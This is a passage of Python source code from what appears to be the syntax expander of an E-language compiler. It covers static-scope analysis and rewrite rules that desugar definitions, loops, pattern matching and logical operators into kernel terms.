        self.varNames = ScopeSet(varNames)
        self.metaStateExprFlag = metaStateExprFlag

    def hide(self):
        # Uses still escape a hidden scope; definitions do not.
        return StaticScope(self.namesRead, self.namesSet,
                           self.metaStateExprFlag,
                           None, None)

    def add(self, right):
        """
        For processing normal expressions left to right, where all definitions
        are exported, but uses are hidden by definitions to their left.
        """
        if right is None:
            return self
        # Reads/assigns on the right are only free if the left didn't define
        # the name first.
        rightNamesRead = (right.namesRead - self.defNames) - self.varNames
        rightNamesSet = (right.namesSet - self.varNames)
        # Assigning to a name the left defined as final is an error.
        badAssigns = rightNamesSet & self.defNames
        if badAssigns:
            if len(badAssigns) == 1:
                raise ValueError("Can't assign to final noun %r" % tuple(badAssigns))
            else:
                raise ValueError("Can't assign to final nouns %s" % ', '.join(badAssigns))
        #rightNamesSet = rightNamesSet - badAssigns
        return StaticScope(self.namesRead | rightNamesRead,
                           self.namesSet | rightNamesSet,
                           self.metaStateExprFlag or right.metaStateExprFlag,
                           self.defNames | right.defNames,
                           self.varNames | right.varNames)

    def namesUsed(self):
        """
        What are the names of variables used by this expression that refer to
        variables defined outside this expression?

        Union of namesRead and namesSet.
        """
        return self.namesRead | self.namesSet

    def outNames(self):
        """
        What variables are defined in this expression that are visible after
        this expression (i.e., to its right)?

        Union of defNames and varNames.
        """
        return self.defNames | self.varNames

    def __repr__(self):
        return "<%r := %r =~ %r + var %r %s>" % (list(self.namesSet),
                                                 list(self.namesRead),
                                                 list(self.defNames),
                                                 list(self.varNames),
                                                 ("meta.getState()"
                                                  if self.metaStateExprFlag
                                                  else ""))
def getExports(scope, used):
    """Names defined by `scope` that `used` actually consumes.

    When `used` is None or mentions meta.getState(), everything `scope`
    defines is considered exported.
    """
    exported = scope.outNames()
    if used is None or used.metaStateExprFlag:
        return exported
    return exported & used.namesUsed()
def union(scopes, result=None):
    """Fold a sequence of scopes together with StaticScope.add.

    `None` entries and bare lists are skipped. The previous default argument
    `result=StaticScope()` was evaluated once at definition time (a shared
    mutable-default anti-pattern); a `None` sentinel keeps the behavior while
    constructing a fresh empty scope per call.
    """
    if result is None:
        result = StaticScope()
    for sc in scopes:
        if sc and not isinstance(sc, list):
            result = result.add(sc)
    return result
def foldr(f, a, bs):
    """Left-to-right fold (despite the name): combine `a` with each element of `bs`."""
    accumulator = a
    for element in bs:
        accumulator = f(accumulator, element)
    return accumulator
def verbAssignError(parser, target):
    """Report a misuse of update-assign (`x op= y`) on an unassignable target."""
    hole_messages = {
        "QuasiLiteralExpr": ("Can't use update-assign syntax on a \"$\"-hole. "
                             "Use explicit \":=\" syntax instead."),
        "QuasiPatternExpr": ("Can't use update-assign syntax on a \"@\"-hole. "
                             "Use explicit \":=\" syntax instead."),
    }
    fallback = "Can only update-assign nouns and calls"
    err(hole_messages.get(target.tag.name, fallback), parser)
def err(msg, parser):
    """Raise a parse error carrying `msg` at the parser's current input position."""
    raise parser.input.error.withMessage([("message", msg)])
def expandCallVerbAssign(self, verb, args, receiver, methVerb, methArgs):
    """Expand `receiver.methVerb(methArgs) verb= args` into kernel terms.

    Binds the receiver and each method argument to temporaries so they are
    evaluated exactly once, then reuses the plain Assign expansion on the
    rebuilt call.
    """
    r = self.mktemp("recip")
    prelude = t.Def(t.FinalPattern(r, None), None, receiver)
    seq = [prelude]
    setArgs = []
    for arg in methArgs.args:
        a = self.mktemp("arg")
        seq.append(t.Def(t.FinalPattern(a, None), None, arg))
        setArgs.append(a)
    # Run the Assign expansion and splice the statements of its SeqExpr in.
    seq.extend(self.apply("transform", [t.Assign(t.MethodCallExpr(r, methVerb, setArgs), t.MethodCallExpr(t.MethodCallExpr(r, methVerb, setArgs), verb, args))])[0][0].args[0].args)
    return t.SeqExpr(seq)
def expandDef(self, patt, optEj, rval, nouns):
    """Expand `def patt exit optEj := rval`, breaking def/use cycles.

    When the pattern defines final names that the right-hand side also
    reads, the definition is rewritten to route those names through Ref
    promises, resolved after the definition completes.

    NOTE(review): the `nouns` parameter is unused here.
    """
    pattScope = scope(patt)
    defPatts = pattScope.defNames
    varPatts = pattScope.varNames
    rvalScope = scope(rval)
    if optEj:
        rvalScope = scope(optEj).add(rvalScope)
    rvalUsed = rvalScope.namesUsed()
    # `var` names may not participate in cycles, and the pattern may not use
    # names the right side defines.
    if len(varPatts & rvalUsed) != 0:
        err("Circular 'var' definition not allowed", self)
    if len(pattScope.namesUsed() & rvalScope.outNames()) != 0:
        err("Pattern may not use var defined on the right", self)
    conflicts = defPatts & rvalUsed
    if len(conflicts) == 0:
        # No cycle: emit the definition unchanged.
        return t.Def(patt, optEj, rval)
    else:
        promises = []
        resolves = []
        renamings = {}
        for oldNameStr in conflicts.getKeys():
            newName = self.mktemp(oldNameStr)
            newNameR = self.mktemp(oldNameStr + "R")
            renamings[oldNameStr] = newName
            # def [newName, newNameR] := Ref.promise()
            pair = [t.FinalPattern(newName, None),
                    t.FinalPattern(newNameR, None)]
            promises.append(t.Def(t.ListPattern(pair, None), None,
                                  mcall("Ref", "promise")))
            resolves.append(t.MethodCallExpr(newNameR, "resolve",
                                             [t.NounExpr(oldNameStr)]))
        resName = self.mktemp("value")
        resolves.append(resName)
        # Rewrite rval so cyclic reads go through the promise temporaries.
        cr = CycleRenamer([rval])
        cr.renamings = renamings
        rval = cr.apply("transform")[0]
        resPatt = t.FinalPattern(resName, None)
        resDef = t.Def(resPatt, None, t.Def(patt, optEj, rval))
        return t.SeqExpr(promises + [resDef] + resolves)
computeStaticScopeRules = """
null = anything:t ?(t is None or t.tag.name == 'null') -> StaticScope()
LiteralExpr(:val) -> StaticScope()
NounExpr(@name) -> StaticScope(namesRead=[name])
TempNounExpr(@name @idx) -> StaticScope(namesRead=[name + str(idx)])
SlotExpr(@name) -> StaticScope(namesRead=[name])
BindingExpr(@b) -> b
HideExpr(@blockScope) -> blockScope.hide()
Meta("Context") -> StaticScope()
Meta("State") -> StaticScope(metaStateExprFlag=True)
SeqExpr(@scopes) -> union(scopes)
Module(@imports @exports :body) -> union(imports).add(union(exports))
MethodCallExpr(@receiverScope :verb @argScopes) -> union(argScopes, receiverScope)
Def(@patternScope @exitScope @exprScope) -> patternScope.add(exitScope).add(exprScope)
Assign(NounExpr(@name) @rightScope) -> StaticScope(namesSet=[name]).add(rightScope)
Assign(TempNounExpr(@name @idx) @rightScope) -> StaticScope(namesSet=[name + str(idx)]).add(rightScope)
IgnorePattern(@guardScope) -> guardScope or StaticScope()
VarPattern(NounExpr(@name) @guardScope) -> StaticScope(varNames=[name]).add(guardScope)
VarPattern(TempNounExpr(@name @idx) @guardScope) -> StaticScope(varNames=[name + str(idx)]).add(guardScope)
FinalPattern(NounExpr(@name) @guardScope) -> StaticScope(defNames=[name]).add(guardScope)
FinalPattern(TempNounExpr(@name @idx) @guardScope) -> StaticScope(defNames=[name + str(idx)]).add(guardScope)
SlotPattern(NounExpr(@name) @guardScope) -> StaticScope(varNames=[name]).add(guardScope)
BindingPattern(NounExpr(@name)) -> StaticScope(varNames=[name])
BindingPattern(TempNounExpr(@name @idx)) -> StaticScope(varNames=[name + str(idx)])
ListPattern(@patternScopes null) -> union(patternScopes)
ViaPattern(@exprScope @patternScope) -> exprScope.add(patternScope)
Script(@extends @methodScopes @matcherScopes) -> union(methodScopes + matcherScopes)
Object(@doco @nameScope @auditorScope @scriptScope) -> nameScope.add(union(auditorScope).add(scriptScope))
Method(@doco @verb @paramsScope @guardScope @blockScope) -> union(paramsScope + [(guardScope or StaticScope()), blockScope.hide()]).hide()
Matcher(@patternScope @blockScope) -> patternScope.add(blockScope).hide()
If(@testScope @consqScope @altScope) -> testScope.add(consqScope).hide().add(altScope).hide()
KernelTry(@tryScope @patternScope @catchScope) -> tryScope.hide().add(patternScope.add(catchScope)).hide()
Finally(@tryScope @finallyScope) -> tryScope.hide().add(finallyScope).hide()
Escape(@ejScope @bodyScope null null) -> ejScope.add(bodyScope).hide()
Escape(@ejScope @bodyScope @argScope @catcherScope) -> ejScope.add(bodyScope).hide().add(argScope.add(catcherScope)).hide()
MatchBind(@specimen @pattern) -> specimen.add(pattern)
LogicalAnd(delayed:left delayed:right) -> self.expandAndScope(left).add(self.expandAndScope(right))
LogicalAnd(delayed:left @rightScope) -> self.expandAndScope(left).add(right)
LogicalAnd(@leftScope delayed:right) -> leftScope.add(self.expandAndScope(right))
LogicalAnd(@leftScope @rightScope) -> leftScope.add(rightScope)
LogicalOr(expand:left expand:right) -> StaticScope(left.namesRead | right.namesRead,
left.namesSet | right.namesSet,
left.metaStateExprFlag or right.metaStateExprFlag,
left.defNames | right.defNames,
left.varNames | right.varNames)
"""
def scope(term):
    """Compute the static scope of *term*, defaulting to an empty scope.

    Runs the StaticScopeTransformer over the term; a transform result of
    None is normalized to a fresh, empty StaticScope.
    """
    result = StaticScopeTransformer.transform(term)[0]
    return StaticScope() if result is None else result
def mcall(noun, verb, *expr):
    """Build a MethodCallExpr term invoking *verb* on the noun named *noun*."""
    receiver = t.NounExpr(noun)
    return t.MethodCallExpr(receiver, verb, expr)
def putVerb(verb):
    """Map a read verb to the matching write verb.

    "get" -> "put", "run" -> "setRun", "getX" -> "setX",
    "__getX" -> "__setX"; any other verb yields None.
    """
    if verb == "get":
        return "put"
    if verb == "run":
        return "setRun"
    if verb.startswith("get"):
        return "set" + verb[3:]
    if verb.startswith("__get"):
        return "__set" + verb[5:]
    return None
def buildQuasi(name, pairs):
    """Split quasiliteral segments into text, expr-hole and pattern-hole parts.

    Each entry of *pairs* is a (text, expr, patt) triple with at most one of
    expr/patt populated.  Holes are represented in the text stream as calls
    to the quasiparser's valueHole/patternHole, indexed by their position
    among holes of the same kind.
    """
    textParts = []
    exprParts = []
    patternParts = []
    for text, expr, patt in pairs:
        if expr:
            hole = t.MethodCallExpr(
                t.NounExpr(name + "__quasiParser"), "valueHole",
                [t.LiteralExpr(len(exprParts))])
            textParts.append(hole)
            exprParts.append(expr)
        elif patt:
            hole = t.MethodCallExpr(
                t.NounExpr(name + "__quasiParser"), "patternHole",
                [t.LiteralExpr(len(patternParts))])
            textParts.append(hole)
            patternParts.append(patt)
        else:
            textParts.append(t.LiteralExpr(text.data))
    return textParts, exprParts, patternParts
#implicit rules:
# data transforms to itself
# tuples transform to tuples with each item transformed
# other terms transform to terms of the same name with each arg transformed
expander = """
#no args and lowercase means this isn't automatically treated as a
#term, so we explicitly deal with it here
null = anything:t ?(t is None or t.tag.name == 'null')
nameAndString = NounExpr(:name):e !(self.nouns.add(name)) -> e, name.data
| SlotExpr(NounExpr(:name)):e -> e, '&' + name.data
| BindingExpr(NounExpr(:name)):e -> e, '&&' + name.data
| VarPattern(name:name :guard):p transform(p):e -> e, name
| BindPattern(name:name :guard):p transform(p):e -> e, name
| FinalPattern(name:name :guard):p transform(p):e -> e, name
| SlotPattern(name:name :guard):p transform(p):e -> e, '&' + name
| BindingPattern(name:name):p transform(p):e -> e, '&&' + name
name = NounExpr(:name) !(self.nouns.add(name)) -> name.data
| SlotExpr(:name) -> '&' + name.data
| BindingExpr(NounExpr(:name)) -> '&&' + name.data
NounExpr(@name) !(self.nouns.add(name)) -> t.NounExpr(name)
URIExpr(@scheme @body) -> mcall(scheme + "__uriGetter", "get", t.LiteralExpr(body))
URIGetter(@scheme) -> t.NounExpr(scheme + "__uriGetter")
MapExpr(@assocs) -> mcall("__makeMap", "fromPairs", mcall("__makeList", "run", *[mcall("__makeList", "run", *a) for a in assocs]))
MapExprAssoc(@key @value) -> [key, value]
MapExprExport(nameAndString:pair) -> [t.LiteralExpr(pair[1]), pair[0]]
ListExpr(@items) -> mcall("__makeList", "run", *items)
QuasiExpr(null [qexpr("simple"):qs]) -> t.MethodCallExpr(mcall("simple__quasiParser", "valueMaker", mcall("__makeList", "run", *qs[0])), "substitute", [mcall("__makeList", "run", *qs[1])])
QuasiExpr(@name [qexpr(name):qs]) -> t.MethodCallExpr(mcall(name + "__quasiParser", "valueMaker", mcall("__makeList", "run", *qs[0])), "substitute", [mcall("__makeList", "run", *qs[1])])
qexpr :name = (qtext | qehole)*:pairs -> buildQuasi(name, pairs)
qpatt :name = (qtext | qehole | qphole)*:pairs -> buildQuasi(name, pairs)
qtext = QuasiText(:text) -> (text, None, None)
qehole = QuasiExprHole(@expr) -> (None, expr, None)
qphole = QuasiPatternHole(@patt) -> (None, None, patt)
Module(@imports :exports @expr) -> t.Module(imports, exports, expr)
SeqExpr([]) -> None
SeqExpr(@exprs) -> t.SeqExpr(flattenSeqs(exprs))
VerbCurryExpr(@receiver :verb) -> mcall("__makeVerbFacet", "curryCall", receiver, t.LiteralExpr(verb))
GetExpr(@receiver @index) -> t.MethodCallExpr(receiver, "get", index)
FunctionCallExpr(@receiver @args) -> t.MethodCallExpr(receiver, "run", args)
FunctionSendExpr(@receiver @args) -> mcall("M", "send", receiver, t.LiteralExpr("run"), args)
MethodSendExpr(@receiver :verb @args) -> mcall("M", "send", receiver, t.LiteralExpr(verb), mcall("__makeList", "run", *args))
SendCurryExpr(@receiver :verb) -> mcall("__makeVerbFacet", "currySend", receiver, t.LiteralExpr(verb))
Minus(@receiver) -> t.MethodCallExpr(receiver, "negate", [])
LogicalNot(@receiver) -> t.MethodCallExpr(receiver, "not", [])
BinaryNot(@receiver) -> t.MethodCallExpr(receiver, "complement", [])
Pow(@left @right) -> binop("pow", left, right)
Multiply(@left @right) -> binop("multiply", left, right)
Divide(@left @right) -> binop("approxDivide", left, right)
FloorDivide(@left @right) -> binop("floorDivide", left, right)
Mod(Pow(@x @y) @z) -> t.MethodCallExpr(x, "modPow", [y, z])
Mod(MethodCallExpr(@x "pow" [@y]) @z) -> t.MethodCallExpr(x, "modPow", [y, z])
Mod(@left @right) -> binop("mod", left, right)
Add(@left @right) -> binop("add", left, right)
Subtract(@left @right) -> binop("subtract", left, right)
ShiftRight(@left @right) -> binop("shiftRight", left, right)
ShiftLeft(@left @right) -> binop("shiftLeft", left, right)
Till(@left @right) -> mcall("__makeOrderedSpace", "op__till", left, right)
Thru(@left @right) -> mcall("__makeOrderedSpace", "op__thru", left, right)
GreaterThan(@left @right) -> mcall("__comparer", "greaterThan", left, right)
GreaterThanEqual(@left @right) -> mcall("__comparer", "geq", left, right)
AsBigAs(@left @right) -> mcall("__comparer", "asBigAs", left, right)
LessThanEqual(@left @right) -> mcall("__comparer", "leq", left, right)
LessThan(@left @right) -> mcall("__comparer", "lessThan", left, right)
Coerce(@spec @guard) -> t.MethodCallExpr(mcall("ValueGuard", "coerce", guard, t.NounExpr("throw")), "coerce", [spec, t.NounExpr("throw")])
MatchBind(@spec @patt) -> expandMatchBind(self, spec, patt)
Mismatch(@spec @patt) -> t.MethodCallExpr(expandMatchBind(self, spec, patt), "not", [])
Same(@left @right) -> mcall("__equalizer", "sameEver", left, right)
NotSame(@left @right) -> t.MethodCallExpr(mcall("__equalizer", "sameEver", left, right), "not", [])
ButNot(@left @right) -> binop("butNot", left, right)
BinaryOr(@left @right) -> binop("or", left, right)
BinaryAnd(@left @right) -> binop("and", left, right)
BinaryXor(@left @right) -> binop("xor", left, right)
LogicalAnd(@left @right) -> expandLogical(self, left, right, expandAnd)
LogicalOr(@left @right) -> expandLogical(self, left, right, expandOr)
Def(@pattern @exit @expr) -> expandDef(self, pattern, exit, expr, self.nouns)
Forward(@name) !(t.NounExpr(name.args[0].data + "__Resolver")):rname -> t.SeqExpr([
t.Def(t.ListPattern([
t.FinalPattern(name, None),
t.FinalPattern(rname, None)],
None),
None,
mcall("Ref", "promise")),
rname])
Assign(@left @right) = ass(left right)
ass NounExpr(:name) :right -> t.Assign(t.NounExpr(name), right)
ass MethodCallExpr(@receiver @verb @args):left :right !(self.mktemp("ares")):ares -> t.SeqExpr([t.MethodCallExpr(receiver, putVerb(verb), args + [t.Def(t.FinalPattern(ares, None), None, right)]), ares])
ass :left :right -> err("Assignment can only be done to nouns and collection elements", self)
VerbAssign(:verb @target @args) = vass(verb target args)
vass :verb NounExpr(@name) :args -> t.Assign(t.NounExpr(name), mcall(name, verb, *args))
vass :verb MethodCallExpr(@receiver :methVerb :methArgs) :args -> expandCallVerbAssign(self, verb, args, receiver, methVerb, methArgs)
vass :verb :badTarget :args -> verbAssignError(self, badTarget)
AugAssign(@op @left @right) = vass(binops[op] left [right])
Break(null) -> mcall("__break", "run")
Break(@expr) -> mcall("__break", "run", expr)
Continue(null) -> mcall("__continue", "run")
Continue(@expr) -> mcall("__continue", "run", expr)
Return(null) -> mcall("__return", "run")
Return(@expr) -> mcall("__return", "run", expr)
Guard(@expr @subscripts) -> reduce(lambda e, s: t.MethodCallExpr(e, "get", s), subscripts, expr)
#IgnorePattern(@guard) -> t.IgnorePattern(guard)
SamePattern(@value) -> t.ViaPattern(mcall("__matchSame", "run", value), t.IgnorePattern(None))
NotSamePattern(@value) -> t.ViaPattern(mcall("__matchSame", "different", value), t.IgnorePattern(None))
VarPattern(@name @guard) = -> t.VarPattern(name, guard)
BindPattern(@name @guard) -> t.ViaPattern(mcall("__bind", "run", t.NounExpr(name.args[0].data + "__Resolver"), guard), t.IgnorePattern(None))
#FinalPattern(@name @guard) -> t.FinalPattern(name, guard)
SlotExpr(@name) -> slot(name)
SlotPattern(@name null) -> t.ViaPattern(t.NounExpr("__slotToBinding"), t.BindingPattern(name))
SlotPattern(@name @guard) -> t.ViaPattern(t.MethodCallExpr(t.NounExpr("__slotToBinding"), "run", [guard]), t.BindingPattern(name))
MapPattern(@assocs @tail) -> foldr(lambda more, (l, r): t.ViaPattern(l, t.ListPattern([r, more], None)),
tail or t.IgnorePattern(t.NounExpr("__mapEmpty")),
reversed(assocs))
MapPatternAssoc(@key @value) -> [key, value]
MapPatternImport(nameAndString:nameAnd) -> [t.LiteralExpr(nameAnd[1]), nameAnd[0]]
MapPatternOptional(@assoc @default) -> [mcall("__mapExtract", "depr", assoc[0], default), assoc[1]]
MapPatternRequired(@assoc) -> (mcall("__mapExtract", "run", assoc[0]), assoc[1])
ListPattern(@patterns null) -> t.ListPattern(patterns, None)
ListPattern(@patterns @tail) -> t.ViaPattern(mcall("__splitList", "run", t.LiteralExpr(len(patterns))), t.ListPattern(patterns + [tail], None))
SuchThatPattern(@pattern @expr) -> t.ViaPattern(t.NounExpr("__suchThat"),
t.ListPattern([pattern, t.ViaPattern(mcall("__suchThat", "run", expr), t.IgnorePattern(None))], None))
QuasiPattern(null [qpatt("simple"):qs]) -> t.ViaPattern(mcall("__quasiMatcher", "run", mcall("simple__quasiParser", "matchMaker", mcall("__makeList", "run", *qs[0])), mcall("__makeList", "run", *qs[1])), t.ListPattern(qs[2], None))
QuasiPattern(@name [qpatt(name):qs]) -> t.ViaPattern(mcall("__quasiMatcher", "run", mcall(name + "__quasiParser", "matchMaker", mcall("__makeList", "run", *qs[0])), mcall("__makeList", "run", *qs[1])), t.ListPattern(qs[2], None))
Interface(@doco nameAndString:nameAnd @guard @extends @implements
InterfaceFunction(:params :resultGuard))
-> expandInterface(doco, nameAnd[0], nameAnd[1], guard, extends,
implements,
[self.transform(t.MessageDesc("", "to", "run",
params, resultGuard))])
Interface(@doco nameAndString:nameAnd @guard @extends @implements @script)
-> expandInterface(doco, nameAnd[0], nameAnd[1], guard, extends,
implements, script)
MessageDesc(@doco @type @verb @paramDescs @guard)
-> t.HideExpr(mcall("__makeMessageDesc", "run",
doco and t.LiteralExpr(doco), t.LiteralExpr(verb),
mcall("__makeList", "run", *paramDescs),
guard or t.NounExpr("void")))
ParamDesc(name:name @guard) -> mcall("__makeParamDesc", "run", t.LiteralExpr(name), guard or t.NounExpr("any"))
Lambda(@doco @patterns @block) -> t.Object(doco, t.IgnorePattern(None), [None],
t.Script(None,
[t.Method(None, "run", patterns,
None, block)],
[]))
Object(:doco BindPattern(:name :guard):bp :auditors :script):o transform(bp):exName
transform(t.Object(doco, t.FinalPattern(name, None), auditors, script)):exObj
-> t.Def(exName, None, t.HideExpr(exObj))
Object(@doco @name @auditors Function(@params @guard @block))
-> t.Object(doco, name, auditors, t.Script(None,
[t.Method(doco, "run", params, guard,
t.Escape(t.FinalPattern(t.NounExpr("__return"), None),
t.SeqExpr([block, t.NounExpr("null")]), None, None))],
[]))
Object(@doco @name @auditors Script(null @methods @matchers)) -> t.Object(doco, name, auditors, t.Script(None, methods, matchers))
Object(@doco VarPattern(@name @guard):vp @auditors Script(@extends @methods @matchers)) transform(vp):exVP
objectSuper(doco exVP auditors extends methods matchers [slot(t.NounExpr(name))]):o
-> t.SeqExpr([t.Def(slotpatt(name), None, o), name])
Object(@doco @name @auditors Script(@extends @methods @matchers)) =
objectSuper(doco name auditors extends methods matchers []):o -> t.Def(name, None, o)
objectSuper :doco :name :auditors NounExpr(@extends) :methods :matchers :maybeSlot !(self.mktemp("pair")):p -> t.HideExpr(t.SeqExpr([
t.Def(t.BindingPattern(t.NounExpr("super")),
None, t.BindingExpr(t.NounExpr(extends))),
t.Object(doco, name, auditors,
t.Script(None, methods,
matchers + [t.Matcher(t.FinalPattern(p, None),
mcall("M", "callWithPair", t.NounExpr("super"), p))]))
] + maybeSlot))
objectSuper :doco :name :auditors :extends :methods :matchers :maybeSlot !(self.mktemp("pair")):p -> t.HideExpr(t.SeqExpr([
t.Def(t.FinalPattern(t.NounExpr("super"), None),
None, extends),
t.Object(doco, name, auditors,
t.Script(None, methods,
matchers + [t.Matcher(t.FinalPattern(p, None),
mcall("M", "callWithPair", t.NounExpr("super"), p))]))
] + maybeSlot))
To(:doco @verb @params @guard @block) -> t.Method(doco, verb, params, guard, t.Escape(t.FinalPattern(t.NounExpr("__return"), None),
t.SeqExpr([block, t.NounExpr("null")]), None, None))
For(:key :value @coll @block @catcher)
-> expandFor(self, key, value, coll, block, catcher)
ListComp(@key @value @iterable @filter @exp) -> expandComprehension(self, key,
value, iterable, filter, exp,
"__accumulateList")
MapComp(@key @value @iterable @filter @kexp @vexp) -> expandComprehension(self, key,
value, iterable, filter,
mcall("__makeList", "run", kexp, vexp),
"__accumulateMap")
Switch(@expr @matchers) -> expandSwitch(self, expr, matchers)
Try(@tryblock [] null) -> t.HideExpr(tryblock)
Try(@tryblock [(Catch(@p @b) -> (p, b))*:cs] @finallyblock) kerneltry(expandTryCatch(tryblock, cs) finallyblock)
kerneltry :tryexpr null -> tryexpr
kerneltry :tryexpr :finallyexpr -> t.Finally(tryexpr, finallyexpr)
While(@test @block @catcher) = expandWhile(test block catcher)
expandWhile :test :block :catcher -> t.Escape(t.FinalPattern(t.NounExpr("__break"), None), mcall("__loop", "run", mcall("__iterWhile", "run", t.Object(None, t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [], None, test)], []))), t.Object("While loop body", t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [t.IgnorePattern(None), t.IgnorePattern(None)], t.NounExpr("Bool"), t.SeqExpr([t.Escape(t.FinalPattern(t.NounExpr("__continue"), None), block, None, None), t.NounExpr("true")]))], []))), *catcher)
When([@arg] @block :catchers @finallyblock) expandWhen(arg block catchers finallyblock)
When(@args @block :catchers :finallyblock) expandWhen(mcall("promiseAllFulfilled", "run", t.MethodCallExpr(t.NounExpr("__makeList"), "run", args)) block catchers finallyblock)
expandWhen :arg :block [([@p @b] -> (p, b))*:catchers] :finallyblock !(self.mktemp("resolution")):resolution kerneltry(expandTryCatch(t.If(mcall("Ref", "isBroken", resolution), mcall("Ref", "broken", mcall("Ref", "optProblem", resolution)), block), catchers) finallyblock):body -> t.HideExpr(mcall("Ref", "whenResolved", arg, t.Object("when-catch 'done' function", t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [t.FinalPattern(resolution, None)], None, body)], []))))
"""
def flattenSeqs(xs):
    """Flatten nested SeqExpr terms one level into a single item list.

    A non-empty SeqExpr contributes the children of its first argument;
    any other node (including an empty SeqExpr) is kept as-is.
    """
    flattened = []
    for node in xs:
        is_seq = node.tag.name == 'SeqExpr' and bool(node.args)
        flattened.extend(node.args[0].args if is_seq else [node])
    return flattened
def expandSwitch(self, expr, matchers):
    """Expand a Switch term: bind the specimen once, then try matchers in order."""
    specimen = self.mktemp("specimen")
    failureTemps = [self.mktemp("failure") for _ in matchers]
    matcherChain = matchExpr(self, matchers, specimen, failureTemps)
    return t.HideExpr(t.SeqExpr([
        t.Def(t.FinalPattern(specimen, None), None, expr),
        matcherChain]))
def matchExpr(self, matchers, sp, failures):
    """Build the nested Escape chain that tries each matcher in turn.

    Works right-to-left: the innermost fallback invokes __switchFailed with
    the specimen and every captured failure; each matcher then wraps the
    accumulated block in an Escape whose catch-pattern records why that
    matcher failed.
    """
    ejs = [self.mktemp("ej") for _ in matchers]
    block = mcall("__switchFailed", "run", sp, *failures)
    # BUG FIX: materialize with list() before reversed() — zip() returns a
    # non-reversible iterator on Python 3 (bare reversed(zip(...)) only
    # worked on Python 2, where zip() returned a list).
    for m, fail, ej in reversed(list(zip(matchers, failures, ejs))):
        block = t.Escape(
            t.FinalPattern(ej, None),
            t.SeqExpr([
                t.Def(m.args[0], ej, sp),
                m.args[1]]),
            t.FinalPattern(fail, None),
            block)
    return block
def expandTryCatch(tryblock, catchers):
    """Nest KernelTry terms around *tryblock*, one per (pattern, handler) pair."""
    result = tryblock
    for patt, handler in catchers:
        result = t.KernelTry(result, patt, handler)
    return result
def binop(name, left, right):
    """Desugar a binary operator into the method call left.name(right)."""
    args = [right]
    return t.MethodCallExpr(left, name, args)
def expandLogical(self, left, right, fn):
    """Shared expansion for && and ||.

    Both operands may define names.  The expansion collects every name
    either side defines, evaluates the operator via *fn* (expandAnd or
    expandOr), and rebinds the union of those names plus a boolean result
    in the enclosing scope.
    """
    leftmap = scope(left).outNames()
    rightmap = scope(right).outNames()
    both = [t.NounExpr(n) for n in leftmap | rightmap]
    result = self.mktemp("ok")
    # Success value: [true, <binding of every defined name>].
    # TRUE/FALSE are presumably module-level term constants — defined
    # outside this chunk.
    success = t.MethodCallExpr(t.NounExpr("__makeList"), "run",
                               [TRUE] + [t.BindingExpr(n) for n in both])
    # Failure value: __booleanFlow supplies broken bindings of matching arity.
    failure = t.MethodCallExpr(t.NounExpr("__booleanFlow"), "failureList", [t.LiteralExpr(len(both))])
    return t.SeqExpr([
        t.Def(t.ListPattern([t.FinalPattern(result, None)] +
                            [t.BindingPattern(n) for n in both], None),
              None,
              fn(left, right, success, failure, leftmap, rightmap)),
        result])
def expandAnd(left, right, success, failure, leftmap, rightmap):
    """Expand `left && right`: both operands must succeed, otherwise fail."""
    rightBranch = t.If(right, success, failure)
    return t.If(left, rightBranch, failure)
def expandOr(left, right, success, failure, leftmap, rightmap):
    """Expand `left || right`, breaking bindings only the losing side defines."""
    broken = mcall("__booleanFlow", "broken")

    def partialFail(failed):
        brokenDefs = [t.Def(t.BindingPattern(n), None, broken) for n in failed]
        return t.SeqExpr(brokenDefs + [success])

    onlyRight = [t.NounExpr(n) for n in rightmap - leftmap]
    onlyLeft = [t.NounExpr(n) for n in leftmap - rightmap]
    fallback = t.If(right, partialFail(onlyLeft), failure)
    return t.If(left, partialFail(onlyRight), fallback)
def expandInterface(doco, name, nameStr, guard, extends, implements, script):
    """Expand an `interface` declaration into a __makeProtocolDesc call.

    With a guard, the interface/guard pair is built via "makePair" and
    destructured; otherwise a single protocol object is defined directly.
    """
    def makeIFace(verb):
        # Fully-qualified name: the meta-context FQN prefix + "<name>__T".
        return t.HideExpr(
            mcall("__makeProtocolDesc", verb, doco and t.LiteralExpr(doco),
                  t.MethodCallExpr(
                      t.MethodCallExpr(t.Meta("Context"), "getFQNPrefix", []),
                      "add", [t.LiteralExpr(nameStr + "__T")]),
                  mcall("__makeList", "run", *extends),
                  mcall("__makeList", "run", *implements),
                  mcall("__makeList", "run", *script)))
    if guard:
        # Bind [name, guard] from the pair, then return element 0 (the interface).
        return t.MethodCallExpr(
            t.Def(t.ListPattern([name, guard], None), None, makeIFace("makePair")),
            "get", [t.LiteralExpr(0)])
    else:
        return t.Def(name, None, makeIFace("run"))
def validateFor(self, left, right):
    """Reject scoping conflicts between a loop's patterns and its iterable."""
    leftDefined = left.outNames()
    rightDefined = right.outNames()
    if leftDefined & right.namesUsed():
        err("Use on right isn't really in scope of definition", self)
    if rightDefined & left.namesUsed():
        err("Use on left would get captured by definition on right", self)
def expandFor(self, key, value, coll, block, catcher):
    """Expand a `for key => value in coll { block }` loop.

    Builds an anonymous two-argument loop-body object handed to __loop,
    wrapped in __break/__continue ejectors.  A var flag, cleared in a
    finally, lets __validateFor reject calls into a stale loop body.
    """
    if key.tag.name == "null":
        key = t.IgnorePattern(None)
    validateFor(self, scope(key).add(scope(value)), scope(coll))
    fTemp = self.mktemp("validFlag")
    kTemp = self.mktemp("key")
    vTemp = self.mktemp("value")
    obj = t.Object(
        "For-loop body", t.IgnorePattern(None),
        [None],
        t.Script(
            None,
            [t.Method(None, "run",
                      [t.FinalPattern(kTemp, None),
                       t.FinalPattern(vTemp, None)],
                      None,
                      t.SeqExpr([
                          # Reject invocation after the loop has exited.
                          mcall("__validateFor", "run", fTemp),
                          t.Escape(
                              t.FinalPattern(t.NounExpr("__continue"), None),
                              t.SeqExpr([
                                  # Bind user patterns to the temps, then run the body.
                                  t.Def(key, None, kTemp),
                                  t.Def(value, None, vTemp),
                                  block,
                                  t.NounExpr("null")]),
                              None,
                              None)]))],
            []))
    return t.Escape(
        t.FinalPattern(t.NounExpr("__break"), None),
        t.SeqExpr([t.Def(
            t.VarPattern(fTemp, None), None,
            t.NounExpr("true")),
            t.Finally(
                t.MethodCallExpr(
                    t.NounExpr("__loop"),
                    "run",
                    [coll, obj]),
                # Invalidate the loop body once iteration finishes.
                t.Assign(fTemp, t.NounExpr("false"))),
            t.NounExpr("null")]),
        *catcher)
def expandComprehension(self, key, value, coll, filtr, exp, collector):
